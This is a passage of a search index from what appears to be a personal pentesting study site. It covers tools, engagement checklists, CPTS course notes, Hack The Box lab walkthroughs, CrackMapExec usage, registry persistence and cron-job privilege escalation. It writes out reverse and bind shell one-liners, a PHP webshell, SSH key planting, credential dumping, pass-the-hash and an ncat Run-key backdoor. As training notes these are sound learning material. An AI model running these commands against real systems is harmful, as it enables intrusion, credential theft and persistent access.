    ","tags":["web pentesting","proxy","burpsuite","tools"]},{"location":"cewl/","title":"cewl - A custom dictionary generator","text":"","tags":["web pentesting","enumeration","dictionaries","tools"]},{"location":"cewl/#installation","title":"Installation","text":"

    Preintalled in Kali Linux.

    Github repo: https://github.com/digininja/CeWL.

    ","tags":["web pentesting","enumeration","dictionaries","tools"]},{"location":"cewl/#basic-commands","title":"Basic commands","text":"
    cewl -m 6 -d 3 --lowercase  URL\n# -d <x>,--depth <x>: Depth to spider to, default 2.\n# -m, --min_word_length: Minimum word length, default 3.\n# --lowercase: save as lowercase\n
    ","tags":["web pentesting","enumeration","dictionaries","tools"]},{"location":"cewl/#examples-from-real-life","title":"Examples from real life","text":"
    cewl domain/path-to-post -w outputfile.txt\n# -w output a list of words to a file.\n
    ","tags":["web pentesting","enumeration","dictionaries","tools"]},{"location":"cff-explorer/","title":"CFF explorer","text":"

    Created by Erik Pistelli, a freeware suite of tools including a PE editor called CFF Explorer and a process viewer. The PE editor has full support for PE32/64. Special fields description and modification (.NET supported), utilities, rebuilder, hex editor, import adder, signature scanner, signature manager, extension support, scripting, disassembler, dependency walker etc. First PE editor with support for .NET internal structures. Resource Editor (Windows Vista icons supported) capable of handling .NET manifest resources. The suite is available for x86 and x64.

    ","tags":["windows","thick applications"]},{"location":"cff-explorer/#installation","title":"Installation","text":"

    Download from Explorer Suite \u2013 NTCore.

    ","tags":["windows","thick applications"]},{"location":"checksum/","title":"Checksum","text":"","tags":["file integrity","checksum"]},{"location":"checksum/#description","title":"Description","text":"

    A checksum is a small-sized datum from a block of digital data for the purpose of detecting errors which may have been introduced during its transmission or storage.

    Each checksum is generated by a checksum algorithm. Basically, it takes a file as input and outputs the checksum value of that file. There are various algorithms for generating checksums. Here is the name of some of them and the tool employed to generate them:

    Algorithm Tool MD5 md5sum SHA-1 sha1sum SHA-256 sha256","tags":["file integrity","checksum"]},{"location":"checksum/#how-to-use-checksum-to-verify-file-integrity","title":"How to use checksum to verify file integrity","text":"

    Go to the directory where the file is stored. Let's suppose we are using MD5 to checksum the file.

    md5sum fileName\n

    As a result, it prints out the MD5 (128-bit) checksum of the file. Usually, when downloading a file you are given a checksum to compare it with the one you can generate from the file. If there is a difference, no matter how minimum that is, then we can assume the downloaded file has been alterated.

    ","tags":["file integrity","checksum"]},{"location":"cloning-a-site/","title":"Tools for cloning a site","text":"

    BeEF.

    Veil

    URLCrazy: URLCrazy is an OSINT tool to generate and test domain typos or variations to detect or perform typo squatting, URL hijacking, phishing, and corporate espionage.

    ","tags":["web pentesting","phishing","tools"]},{"location":"computer-forensic-fundamentals/","title":"Computer Forensic Fundamentals","text":"","tags":["forensic"]},{"location":"computer-forensic-fundamentals/#mbr","title":"MBR","text":"

    The Master Boot Record (MBR) is\u00a0the information in the first sector of a hard disk or a removable drive. It identifies how and where the system's operating system (OS) is located in order to be booted (loaded) into the computer's main storage or random access memory (RAM).

    ","tags":["forensic"]},{"location":"computer-forensic-fundamentals/#file-systems","title":"File systems","text":"

    | Windows / floppy disls /USB sticks | FAT12, FAT 16/32, NTFS | | Linux most common | ext, Apple/MAC, HFS | | CDs most commons | ISO 9660, ISO 13490 | | DVDs most common | UDF, Joliet |

    ","tags":["forensic"]},{"location":"computer-forensic-fundamentals/#usb-sticks","title":"USB sticks","text":"

    Get serial number and manufacture information (useful in linking to an OS later).

    First time USB device connected to system (registry key):

    HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Enum\\USBSTOR\n

    Last time USB device connected to system (registry key):

    HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\DeviceClass\n
    ","tags":["forensic"]},{"location":"computer-forensic-fundamentals/#ftk-imager-a-tool-for-forensic-analysis","title":"FTK imager - A tool for forensic analysis","text":"

    What is it? A tool that quickly assess electronic evidence by obtaining forensic images of computer data, without making changes to the original evidence.

    ","tags":["forensic"]},{"location":"configuration-files/","title":"Configuration files for some juicy services","text":"","tags":["pentesting","privilege escalation","linux"]},{"location":"configuration-files/#exposed-credentials","title":"Exposed Credentials","text":"

    Look for files with read permission and see if they contain any exposed credentials. This is very common with configuration files, log files, and user history files (bash_history in Linux and PSReadLine in Windows).

    /var/www/html/config.php\n
    ","tags":["pentesting","privilege escalation","linux"]},{"location":"contract-checklist/","title":"Contract - Checklist","text":"Checkpoint Description \u2610 NDA Non-Disclosure Agreement (NDA) refers to a secrecy contract between the client and the contractor regarding all written or verbal information concerning an order/project. The contractor agrees to treat all confidential information brought to its attention as strictly confidential, even after the order/project is completed. Furthermore, any exceptions to confidentiality, the transferability of rights and obligations, and contractual penalties shall be stipulated in the agreement. The NDA should be signed before the kick-off meeting or at the latest during the meeting before any information is discussed in detail. \u2610 Goals Goals are milestones that must be achieved during the order/project. In this process, goal setting is started with the significant goals and continued with fine-grained and small ones. \u2610 Scope The individual components to be tested are discussed and defined. These may include domains, IP ranges, individual hosts, specific accounts, security systems, etc. Our customers may expect us to find out one or the other point by ourselves. However, the legal basis for testing the individual components has the highest priority here. \u2610 Penetration Testing Type When choosing the type of penetration test, we present the individual options and explain the advantages and disadvantages. Since we already know the goals and scope of our customers, we can and should also make a recommendation on what we advise and justify our recommendation accordingly. Which type is used in the end is the client's decision. \u2610 Methodologies Examples: OSSTMM, OWASP, automated and manual unauthenticated analysis of the internal and external network components, vulnerability assessments of network components and web applications, vulnerability threat vectorization, verification and exploitation, and exploit development to facilitate evasion techniques. \u2610 Penetration Testing Locations External: Remote (via secure VPN) and/or Internal: Internal or Remote (via secure VPN) \u2610 Time Estimation For the time estimation, we need the start and the end date for the penetration test. This gives us a precise time window to perform the test and helps us plan our procedure. It is also vital to explicitly ask how time windows the individual attacks (Exploitation / Post-Exploitation / Lateral Movement) are to be carried out. These can be carried out during or outside regular working hours. When testing outside regular working hours, the focus is more on the security solutions and systems that should withstand our attacks. \u2610 Third Parties For the third parties, it must be determined via which third-party providers our customer obtains services. These can be cloud providers, ISPs, and other hosting providers. Our client must obtain written consent from these providers describing that they agree and are aware that certain parts of their service will be subject to a simulated hacking attack. It is also highly advisable to require the contractor to forward the third-party permission sent to us so that we have actual confirmation that this permission has indeed been obtained. \u2610 Evasive Testing Evasive testing is the test of evading and passing security traffic and security systems in the customer's infrastructure. We look for techniques that allow us to find out information about the internal components and attack them. It depends on whether our contractor wants us to use such techniques or not. \u2610 Risks We must also inform our client about the risks involved in the tests and the possible consequences. Based on the risks and their potential severity, we can then set the limitations together and take certain precautions. \u2610 Scope Limitations & Restrictions It is also essential to determine which servers, workstations, or other network components are essential for the client's proper functioning and its customers. We will have to avoid these and must not influence them any further, as this could lead to critical technical errors that could also affect our client's customers in production. \u2610 Information Handling HIPAA, PCI, HITRUST, FISMA/NIST, etc. \u2610 Contact Information For the contact information, we need to create a list of each person's name, title, job title, e-mail address, phone number, office phone number, and an escalation priority order. \u2610 Lines of Communication It should also be documented which communication channels are used to exchange information between the customer and us. This may involve e-mail correspondence, telephone calls, or personal meetings. \u2610 Reporting Apart from the report's structure, any customer-specific requirements the report should contain are also discussed. In addition, we clarify how the reporting is to take place and whether a presentation of the results is desired. \u2610 Payment Terms Finally, prices and the terms of payment are explained.","tags":["information-gathering","rules","of","engagement","cpts"]},{"location":"contractor-agreement-checklist/","title":"Contractors Agreement - Checklist for Physical Assessments","text":"Checkpoint Contents \u2610 Introduction Description of this document. \u2610 Contractor Company name, contractor full name, job title. \u2610 Penetration Testers Company name, pentesters full name. \u2610 Contact Information Mailing addresses, e-mail addresses, and phone numbers of all client parties and penetration testers. \u2610 Purpose Description of the purpose for the conducted penetration test. \u2610 Goals Description of the goals that should be achieved with the penetration test. \u2610 Scope All IPs, domain names, URLs, or CIDR ranges. \u2610 Lines of Communication Online conferences or phone calls or face-to-face meetings, or via e-mail. \u2610 Time Estimation Start and end dates. \u2610 Time of the Day to Test Times of the day to test. \u2610 Penetration Testing Type External/Internal Penetration Test/Vulnerability Assessments/Social Engineering. \u2610 Penetration Testing Locations Description of how the connection to the client network is established. \u2610 Methodologies OSSTMM, PTES, OWASP, and others. \u2610 Objectives / Flags Users, specific files, specific information, and others. \u2610 Evidence Handling Encryption, secure protocols \u2610 System Backups Configuration files, databases, and others. \u2610 Information Handling Strong data encryption \u2610 Incident Handling and Reporting Cases for contact, pentest interruptions, type of reports \u2610 Status Meetings Frequency of meetings, dates, times, included parties \u2610 Reporting Type, target readers, focus \u2610 Retesting Start and end dates \u2610 Disclaimers and Limitation of Liability System damage, data loss \u2610 Permission to Test Signed contract, contractors agreement","tags":["information-gathering","rules","of","engagement","cpts"]},{"location":"cpts-index/","title":"CPTS","text":"Number Module My notes Duration 01 Penetration Testing Process Penetration Testing Process 6 hours Introduction 02 Network Enumeration with Nmap (Almost) all about nmap 7 hours Reconnaissance, Enumeration & Attack Planning 03 Footprinting Introduction to footprinting Infrastructure and web enumeration Some services: FTP, SMB, NFS, DNS, SMTP, IMAP/POP3,SNMP, MySQL, Oracle TNS, IPMI, SSH, RSYNC, R Services, RDP, WinRM, WMI 2 days Reconnaissance, Enumeration & Attack Planning 04 Information Gathering - Web Edition Information Gathering - Web Edition. With tools such as Gobuster, ffuf, Burpsuite, Wfuzz, feroxbuster 7 hours Reconnaissance, Enumeration & Attack Planning 05 Vulnerability Assessment Vulnerability Assessment: Nessus, Openvas 2 hours Reconnaissance, Enumeration & Attack Planning 06 File Transfer techniques File Transfer Techniques: Linux, Windows, Code- netcat python php and others, Bypassing file upload restrictions, File encryption, Evading techniques when transferring files, LOLbas Living off the land binaries 3 hours Reconnaissance, Enumeration & Attack Planning 07 Shells & Payloads Bind shells, Reverse shells, Spawn a shell, Web shells (Laudanum and nishang) 2 days Reconnaissance, Enumeration & Attack Planning 08 Using the Metasploit Framework Metasploit, Msfvenom 5 hours Reconnaissance, Enumeration & Attack Planning 09 Password Attacks Password attacks 8 hours Exploitation & Lateral Movement 10 Attacking Common Services Common services: FTP SMB (tools: smbclient, smbmap, rpcclient, Samba Suite, crackmapexec, impacket-smbexec, impacket-psexec), Databases (MySQL and Attacking MySQL, MSSQL and Atacking MSSQL, log4j, RDP, DNS, SMTP 8 hours Exploitation & Lateral Movement 11 Pivoting, Tunneling, and Port Forwarding 2 days Exploitation & Lateral Movement 12 Active Directory Enumeration & Attacks 7 days Exploitation & Lateral Movement 13 Using Web Proxies 8 hours Web Exploitation 14 Attacking Web Applications with Ffuf 5 hours Web Exploitation 15 Login Brute Forcing 6 hours Web Exploitation 16 SQL Injection Fundamentals 8 hours Web Exploitation 17 SQLMap Essentials 8 hours Web Exploitation 18 Cross-Site Scripting (XSS) 6 hours Web Exploitation 19 File Inclusion 8 hours Web Exploitation 20 File Upload Attacks 8 hours Web Exploitation 21 Command Injections 6 hours Web Exploitation 22 Web Attacks 2 days Web Exploitation 23 Attacking Common Applications 4 days Web Exploitation 24 Linux Privilege Escalation 8 hours Post-Exploitation 25 Windows Privilege Escalation 4 days Post-Exploitation 26 Documentation & Reporting 2 days Reporting & Capstone 27 Attacking Enterprise Networks 2 days Reporting & Capstone","tags":["CPTS"]},{"location":"cpts-index/#practicing-steps","title":"Practicing Steps","text":"

    Starting point:

    • 2x Modules: The modules chosen should be categorized according to\u00a0two different difficulties:\u00a0technical\u00a0and\u00a0offensive.
    • 3x Retired Machines: we recommend choosing\u00a0two easy\u00a0and\u00a0one medium\u00a0machines. At the end of each module, you will find recommended retired machines to consider that will help you practice the specific tools and topics covered in the module. These hosts will share one or more attack vectors tied to the module.
    • 5x Active Machines: After building a good foundation with the modules and the retired machines, we can venture to\u00a0two easy,\u00a0two medium, and\u00a0one hard\u00a0active machine. We can also take these from the corresponding module recommendations at the end of each module in Academy.
    • 1x Pro Lab / Endgame: These labs are large multi-host environments that often simulate enterprise networks of varying sizes similar to those we could run into during actual penetration tests for our clients.
    ","tags":["CPTS"]},{"location":"cpts-index/#generic-cheat-sheet","title":"Generic cheat sheet","text":"","tags":["CPTS"]},{"location":"cpts-index/#basic-tools","title":"Basic Tools","text":"Command Description General sudo openvpn user.ovpn Connect to VPN ifconfig/ip a Show our IP address netstat -rn Show networks accessible via the VPN ssh\u00a0user@10.10.10.10 SSH to a remote server ftp 10.129.42.253 FTP to a remote server tmux tmux Start tmux ctrl+b tmux: default prefix prefix c tmux: new window prefix 1 tmux: switch to window (1) prefix shift+% tmux: split pane vertically prefix shift+\" tmux: split pane horizontally prefix -> tmux: switch to the right pane Vim vim file vim: open\u00a0file\u00a0with vim esc+i vim: enter\u00a0insert\u00a0mode esc vim: back to\u00a0normal\u00a0mode x vim: Cut character dw vim: Cut word dd vim: Cut full line yw vim: Copy word yy vim: Copy full line p vim: Paste :1 vim: Go to line number 1. :w vim: Write the file 'i.e. save' :q vim: Quit :q! vim: Quit without saving :wq vim: Write and quit","tags":["CPTS"]},{"location":"cpts-index/#pentesting","title":"Pentesting","text":"Command Description Service Scanning nmap 10.129.42.253 Run nmap on an IP nmap -sV -sC -p- 10.129.42.253 Run an nmap script scan on an IP locate scripts/citrix List various available nmap scripts nmap --script smb-os-discovery.nse -p445 10.10.10.40 Run an nmap script on an IP netcat 10.10.10.10 22 Grab banner of an open port smbclient -N -L \\\\\\\\10.129.42.253 List SMB Shares smbclient \\\\\\\\10.129.42.253\\\\users Connect to an SMB share snmpwalk -v 2c -c public 10.129.42.253 1.3.6.1.2.1.1.5.0 Scan SNMP on an IP onesixtyone -c dict.txt 10.129.42.254 Brute force SNMP secret string Web Enumeration gobuster dir -u http://10.10.10.121/ -w /usr/share/dirb/wordlists/common.txt Run a directory scan on a website gobuster dns -d inlanefreight.com -w /usr/share/SecLists/Discovery/DNS/namelist.txt Run a sub-domain scan on a website curl -IL https://www.inlanefreight.com Grab website banner whatweb 10.10.10.121 List details about the webserver/certificates curl 10.10.10.121/robots.txt List potential directories in\u00a0robots.txtctrl+U View page source (in Firefox) Public Exploits searchsploit openssh 7.2 Search for public exploits for a web application msfconsole MSF: Start the Metasploit Framework search exploit eternalblue MSF: Search for public exploits in MSF use exploit/windows/smb/ms17_010_psexec MSF: Start using an MSF module show options MSF: Show required options for an MSF module set RHOSTS 10.10.10.40 MSF: Set a value for an MSF module option check MSF: Test if the target server is vulnerable exploit MSF: Run the exploit on the target server is vulnerable Using Shells nc -lvnp 1234 Start a\u00a0nc\u00a0listener on a local port bash -c 'bash -i >& /dev/tcp/10.10.10.10/1234 0>&1' Send a reverse shell from the remote server rm /tmp/f;mkfifo /tmp/f;cat /tmp/f\\|/bin/sh -i 2>&1\\|nc 10.10.10.10 1234 >/tmp/f Another command to send a reverse shell from the remote server rm /tmp/f;mkfifo /tmp/f;cat /tmp/f\\|/bin/bash -i 2>&1\\|nc -lvp 1234 >/tmp/f Start a bind shell on the remote server nc 10.10.10.1 1234 Connect to a bind shell started on the remote server python -c 'import pty; pty.spawn(\"/bin/bash\")' Upgrade shell TTY (1) ctrl+z\u00a0then\u00a0stty raw -echo\u00a0then\u00a0fg\u00a0then\u00a0enter\u00a0twice Upgrade shell TTY (2) echo \"<?php system(\\$_GET['cmd']);?>\" > /var/www/html/shell.php Create a webshell php file curl http://SERVER_IP:PORT/shell.php?cmd=id Execute a command on an uploaded webshell Privilege Escalation ./linpeas.sh Run\u00a0linpeas\u00a0script to enumerate remote server sudo -l List available\u00a0sudo\u00a0privileges sudo -u user /bin/echo Hello World! Run a command with\u00a0sudosudo su - Switch to root user (if we have access to\u00a0sudo su) sudo su user - Switch to a user (if we have access to\u00a0sudo su) ssh-keygen -f key Create a new SSH key echo \"ssh-rsa AAAAB...SNIP...M= user@parrot\" >> /root/.ssh/authorized_keys Add the generated public key to the user ssh\u00a0root@10.10.10.10\u00a0-i key SSH to the server with the generated private key Transferring Files python3 -m http.server 8000 Start a local webserver wget http://10.10.14.1:8000/linpeas.sh Download a file on the remote server from our local machine curl http://10.10.14.1:8000/linenum.sh -o linenum.sh Download a file on the remote server from our local machine scp linenum.sh user@remotehost:/tmp/linenum.sh Transfer a file to the remote server with\u00a0scp\u00a0(requires SSH access) base64 shell -w 0 Convert a file to\u00a0base64echo f0VMR...SNIO...InmDwU \\| base64 -d > shell Convert a file from\u00a0base64\u00a0back to its orig md5sum shell Check the file's\u00a0md5sum\u00a0to ensure it converted correctly","tags":["CPTS"]},{"location":"cpts-labs/","title":"Lab resolution","text":""},{"location":"cpts-labs/#service-scanning","title":"Service scanning","text":"

    Perform an Nmap scan of the target. What does Nmap display as the version of the service running on port 8080?

    sudo nmap -sC -sV -p8080 $ip \n

    Results: Apache Tomcat

    Perform an Nmap scan of the target and identify the non-default port that the telnet service is running on.

    sudo nmap -sC -sV $ip\n

    Results: 2323

    List the SMB shares available on the target host. Connect to the available share as the bob user. Once connected, access the folder called 'flag' and submit the contents of the flag.txt file.

    smbclient  /\\/\\10.129.125.178/\\users -U bob\n# password: Welcome1. Included in the path explanation\n\nsmb>dir\nsmb>cd flag\nsmb>get flag.txt\nsmb>quit\ncat flag.txt\n

    Results: dceece590f3284c3866305eb2473d099

    "},{"location":"cpts-labs/#web-enumeration","title":"Web Enumeration","text":"

    Try running some of the web enumeration techniques you learned in this section on the server above, and use the info you get to get the flag.

    dirb http://94.237.55.246:55655/    \n# From enumeration you can get to dirb http://94.237.55.246:55655/robots.txt\n

    Go to http://94.237.55.246:55655/robots.txt and you will notice http://94.237.55.246:55655/admin-login-page.php

    Visit it and, hardcoded in the site you will see:

                    <!-- TODO: remove test credentials admin:password123 -->\n

    Login into the app.

    Results: HTB{w3b_3num3r4710n_r3v34l5_53cr375}There are many retired boxes on the Hack The Box platform that are great for practicing Metasploit. Some of these include, but not limited to:

    "},{"location":"cpts-labs/#public-exploits","title":"Public Exploits","text":"

    Access to the web app at http://ip:36883

    The title of the wordpress post is \"Simple Backup Plugin 2.7.10\", which is a well-known vulnerable plugin.

    searchsploit Simple Backup Plugin 2.7.10\n
    ----------------------------------------------------------- ---------------------------------\n Exploit Title                                             |  Path\n----------------------------------------------------------- ---------------------------------\nSimple Backup Plugin Python Exploit 2.7.10 - Path Traversa | php/webapps/51937.txt\n----------------------------------------------------------- ---------------------------------\nShellcodes: No Results\n
    sudo cp /usr/share/exploitdb/exploits/php/webapps/51937.txt .\nmv 51937.txt 51937.py\nchmod +x 51937.py\npython ./51937.py http://83.136.255.162:36883/ \"/flag.txt\" 4\n#  target_url = sys.argv[1]\n#  file_name = sys.argv[2]\n#  depth = int(sys.argv[3])\n

    Results: HTB{my_f1r57_h4ck}

    "},{"location":"cpts-labs/#privilege-escalation","title":"Privilege Escalation","text":"

    SSH to $ip with user \"user1\" and password \"password1\". SSH into the server above with the provided credentials, and use the '-p xxxxxx' to specify the port shown above. Once you login, try to find a way to move to 'user2', to get the flag in '/home/user2/flag.txt'.

    ssh user1@$ip -p 31459\n# password1\n\nsudo -l\n# User user1 may run the following commands on\n#        ng-644144-gettingstartedprivesc-udbk3-5969ffb656-cp248:\n#    (user2 : user2) NOPASSWD: /bin/bash\n\n# One way: \necho #!/bin/bash > lala.sh\necho cat /home/user2/flag.txt >> lala.sh\nchmod +x lala.sh\nsudo -u user2  /bin/bash lala.sh\n\n# Another\nsudo -u user2 /bin/bash -i\n

    Results: HTB{l473r4l_m0v3m3n7_70_4n07h3r_u53r}

    Once you gain access to 'user2', try to find a way to escalate your privileges to root, to get the flag in '/root/flag.txt'.

    Once you are user2, go to /root:

    cd /root\nls -la\n
    drwxr-x--- 1 root user2 4096 Feb 12  2021 .\ndrwxr-xr-x 1 root root  4096 Jun  3 19:21 ..\n-rwxr-x--- 1 root user2    5 Aug 19  2020 .bash_history\n-rwxr-x--- 1 root user2 3106 Dec  5  2019 .bashrc\n-rwxr-x--- 1 root user2  161 Dec  5  2019 .profile\ndrwxr-x--- 1 root user2 4096 Feb 12  2021 .ssh\n-rwxr-x--- 1 root user2 1309 Aug 19  2020 .viminfo\n-rw------- 1 root root    33 Feb 12  2021 flag.txt\n

    So we have read access in .ssh folder. We can access and copy the private key

    cd .ssh\ncat id_rsa\n
    -----BEGIN OPENSSH PRIVATE KEY-----\nb3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn\n....\nQfPM8OxSjcVJCpAAAAEXJvb3RANzZkOTFmZTVjMjcwAQ==\n-----END OPENSSH PRIVATE KEY-----\n

    In our attacker machine we save that id_rsa key in our folder

    echo \"the key\" > id_rsa\n

    And now we can login as root

    ssh root@$ip -p 31459 -i id_rsa\n

    And cat the flag:

    cat /root/flag.txt \n

    Results: HTB{pr1v1l363_35c4l4710n_2_r007}

    "},{"location":"cpts-labs/#nibbles-enumeration","title":"Nibbles - Enumeration","text":"

    Run an nmap script scan on the target. What is the Apache version running on the server? (answer format: X.X.XX)

    sudo nmap -sC -sV $ip\n

    Results: 2.4.18

    "},{"location":"cpts-labs/#nibbles-web-footprinting","title":"Nibbles - Web Footprinting","text":"

    Results: 2.4.18

    "},{"location":"crackmapexec/","title":"CrackMapExec","text":"

    Once we have access to a domain, CrackMapExec (CME) will allow us to sweep the network and see which users and machines we can access to.

    CME allows us to authenticate ourselves with the following protocols:

    • smb
    • ssh
    • mssql
    • ldap
    • winrm

    The most used protocol is smb as port 445 is commonly open.

    ","tags":["windows","dump hashes","passwords"]},{"location":"crackmapexec/#installation","title":"Installation","text":"
    sudo apt-get -y install crackmapexec\n
    ","tags":["windows","dump hashes","passwords"]},{"location":"crackmapexec/#basic-usage","title":"Basic usage","text":"

    Main syntax

    crackmapexec <protocol> <target-IP> -u <user or userlist> -p <password or passwordlist>\n
    # Check if we can access a machine\ncrackmapexec smb $ip --local-auth -u <username> -p <password> -d <DOMAIN>\n\n# Spraying password technique\ncrackmapexec smb $ip -u /folder/userlist.txt -p '<password>' --local-auth --continue-on-success\n# --continue-on-success:  continue spraying even after a valid password is found. Useful for spraying a single password against a large user list\n# --local-auth:  if we are targetting a non-domain joined computer, we will need to use the option --local-auth.\n\n# Check which machines we can access in a subnet\ncrackmapexec smb $ip/24 -u <username> -p <password> -d <DOMAIN>\n\n# Get sam: extract hashes from all users authenticated in the machine \ncrackmapexec smb $ip -u <username> -p <password> -d <DOMAIN> --sam\n\n# Get the ntds.dit, given that your user has permissions\ncrackmapexec smb $ip -u <username> -p <password> -d <DOMAIN> --ntds\n\n# See shares\ncrackmapexec smb $ip --local-auth -u <username> -p <password> -d <DOMAIN> --shares\n\n# Enumerate active sessions\ncrackmapexec smb $ip --local-auth -u <username> -p <password> -d <DOMAIN> --sessions\n\n# Enumerate users of the domain\ncrackmapexec smb $ip --local-auth -u <username> -p <password> -d <DOMAIN> --users\n\n# Enumerate logged on users\ncrackmapexec smb $ip --local-auth -u <username> -p <password> -d <DOMAIN> --loggedon-users\n\n# Using a hash instead of a password, to authenticate ourselves: Pass the hash attack (PtH)\ncrackmapexec smb $ip -u <username> -H <hash> -d <DOMAIN>\n\n# Execute commands with flag -x\ncrackmapexec smb $ip/24 -u <Administrator> -d . -H <hash> -x whoami\n
    ","tags":["windows","dump hashes","passwords"]},{"location":"crackmapexec/#rce-with-crackmapexec","title":"RCE with crackmapexec:","text":"
    #  If the--exec-method is not defined, CrackMapExec will try to execute the atexec method, if it fails you can try to specify the --exec-method smbexec.\ncrackmapexec smb $ip -u Administrator -p '<password>' -x 'whoami' --exec-method smbexec\n
    ","tags":["windows","dump hashes","passwords"]},{"location":"crackmapexec/#basic-technique","title":"Basic technique","text":"

    Once we have access to a domain:

    1. Enumerate users and machines in our machine: we will have all users registered and their hashes.

    2. See if any user is in another machine of the domain. Also check if they have admin access.

    3. Goal would be to dump ntds.dit.

    With krbtgt and DC$ user you can get a golden ticket. And with DC$ a silver ticket.

    ","tags":["windows","dump hashes","passwords"]},{"location":"crackmapexec/#what-is-a-sam-hash-like","title":"What is a SAM hash like?","text":"

    Take the Administrator one:

    Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::\n

    Basically, it has 4 parts:

                    user : id: LM-authentication : NTLM\n

    For the purpose of using the hash with CrackMapExec, we will user the NTLM part.

    ","tags":["windows","dump hashes","passwords"]},{"location":"create-a-registry/","title":"Create a Registry","text":"

    Registries in the victim machine may be used to save a connection to the attacker machine.

    ","tags":["privilege escalation"]},{"location":"create-a-registry/#regedit","title":"Regedit","text":"
    Computer\\HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\n\nRight-Button > New > String value\n\nWe name it exactly like the ncat.exe file (if we renamed it to winconfig, then we call this registry winconfig>\n\nWe edit the registry and we add the path to the executable file and some commands\u00a0 in the Value data:\n\n\u201cC:\\Windows/System32\\winconfig.exe <attacker IP> <port> -e cmd.exe\u201d\n\nFor instance: \u201cC:\\Windows/System32\\winconfig.exe 192.168.1.50 5540 -e cmd.exe\u201d\n
    ","tags":["privilege escalation"]},{"location":"create-a-registry/#python-script-that-add-a-binary-to-the-registry","title":"Python script that add a binary to the Registry","text":"

    See Making your binary persistent

    ","tags":["privilege escalation"]},{"location":"cron-jobs/","title":"Cron jobs","text":"

    In Linux, a common form of maintaining scheduled tasks is through Cron Jobs. The equivalent in Windows would be a Scheduled task. There are specific directories that we may be able to utilize to add new cron jobs if we have the write permissions over them:

    1. /etc/crontab

    2. /etc/cron.d

    3. /var/spool/cron/crontabs/root

    Basically, the principle behind this technique is:

    • writing to a directory called by a cron job,
    • and include a bash script with a reverse shell command,
    • which should send us a reverse shell when executed.
    ","tags":["pentesting","privilege escalation","linux"]},{"location":"crunch/","title":"crunch - A dictionary generator","text":"

    Crunch generates combinations of words and manglings to be used later off as attacking dictionaries.

    ","tags":["web pentesting","enumeration","dictionaries","tools"]},{"location":"crunch/#installation","title":"Installation","text":"

    Preinstalled in kali linux. To install:

    sudo apt install crunch\n
    ","tags":["web pentesting","enumeration","dictionaries","tools"]},{"location":"crunch/#basic-commands","title":"Basic commands","text":"
    # Generates words from <number1> to <number2> with the specified characters.\ncrunch <number1> <number2> <characters> -o file.txt\n# <number1>: minimum of characters that password has\n# <number2>: maximum of characters that password has\n# <characters>: those characters included in the set\n# -o: Send output to file.txt\n# There exists more flags\n
    ","tags":["web pentesting","enumeration","dictionaries","tools"]},{"location":"crunch/#resources","title":"Resources","text":"
    • Advanced crunch: https://secf00tprint.github.io/blog/passwords/crunch/advanced/en.
    ","tags":["web pentesting","enumeration","dictionaries","tools"]},{"location":"cryptography/","title":"Cryptography","text":"","tags":["crytography"]},{"location":"cryptography/#encryption-technologies","title":"Encryption Technologies","text":"Encryption Technology Description UNIX crypt(3) Crypt(3) is a traditional UNIX encryption system with a 56-bit key. Traditional DES-based DES-based encryption uses the Data Encryption Standard algorithm to encrypt data. bigcrypt Bigcrypt is an extension of traditional DES-based encryption. It uses a 128-bit key. BSDI extended DES-based BSDI extended DES-based encryption is an extension of the traditional DES-based encryption and uses a 168-bit key. FreeBSD MD5-based (Linux & Cisco) FreeBSD MD5-based encryption uses the MD5 algorithm to encrypt data with a 128-bit key. OpenBSD Blowfish-based OpenBSD Blowfish-based encryption uses the Blowfish algorithm to encrypt data with a 448-bit key. Kerberos/AFS Kerberos and AFS are authentication systems that use encryption to ensure secure entity communication. Windows LM Windows LM encryption uses the Data Encryption Standard algorithm to encrypt data with a 56-bit key. DES-based tripcodes DES-based tripcodes are used to authenticate users based on the Data Encryption Standard algorithm. SHA-crypt hashes SHA-crypt hashes are used to encrypt data with a 256-bit key and are available in newer versions of Fedora and Ubuntu. SHA-crypt and SUNMD5 hashes (Solaris) SHA-crypt and SUNMD5 hashes use the SHA-crypt and MD5 algorithms to encrypt data with a 256-bit key and are available in Solaris. ... and many more.","tags":["crytography"]},{"location":"cryptography/#symmetric-encryption","title":"Symmetric Encryption","text":"

    There is only a shared secret key

    ","tags":["crytography"]},{"location":"cryptography/#asymmetric-pki-encryption","title":"Asymmetric PKI Encryption","text":"

    There is a public and a private key.

    ","tags":["crytography"]},{"location":"cryptography/#digital-certificate","title":"Digital certificate","text":"

    A digital certificate is an electronic document used to identify an individual, a sercer, an organization, or some other entity and associate that entity with a public key.

    Digital certificates are used in PKI public key infraestructure encryption. We can thing of a digital certificate as our \"online\" digital credential that verifies our identity.

    Digital certificates are issued by Certificate Authorities (CA).

    ","tags":["crytography"]},{"location":"cryptography/#emails","title":"Emails","text":"

    Symmetric and asymmetric encryption don't guarantee Integrity, Authentication or Non-Repudiation. They only guarantee Confidentiality.

    To achieve Integrity, Authentication and Non-Repudiation, emails use a digital signature.

    ","tags":["crytography"]},{"location":"cryptography/#windows-encrypted-file-system","title":"Windows Encrypted File System","text":"

    Windows Encrypted File System (EFS) allows us to encrypt individual files and folders. Bit Locker, on the other hand, is full disk encryption.

    Windows encryption uses a combination of symmetric and asymmetric encryption whereas:

    • A separate symmetric secret key is created for each file.
    • A digital certificate is created for the user, which holds the user's private and public pair.

    If the user's digital certificate is deleted or lost, encrypted files and folders can only be decrypted with a Windows Recovery Agent.

    Let's how it's decrypted:

    Software based encryption: uses software tools to encrypt data: bitlocker, windows EFS, Veracrypt, 7zip.

    ","tags":["crytography"]},{"location":"cryptography/#cipher-block-chaining-cbc","title":"Cipher block chaining (CBC)","text":"

    Source: wikipedia

    ","tags":["crytography"]},{"location":"ctr/","title":"ctr.sh","text":"

    It collects information about SSL certificates. If you visit a domain and it contains a certificate you can extract other subdomain by using the View Certificate functionality.

    ","tags":["scanning","domain","subdomain","reconnaissance","tools"]},{"location":"ctr/#usage","title":"Usage","text":"

    In your browser, go to:

    https://crt.sh/

    ","tags":["scanning","domain","subdomain","reconnaissance","tools"]},{"location":"cupp-common-user-password-profiler/","title":"CUPP - Common User Password Profiler","text":"

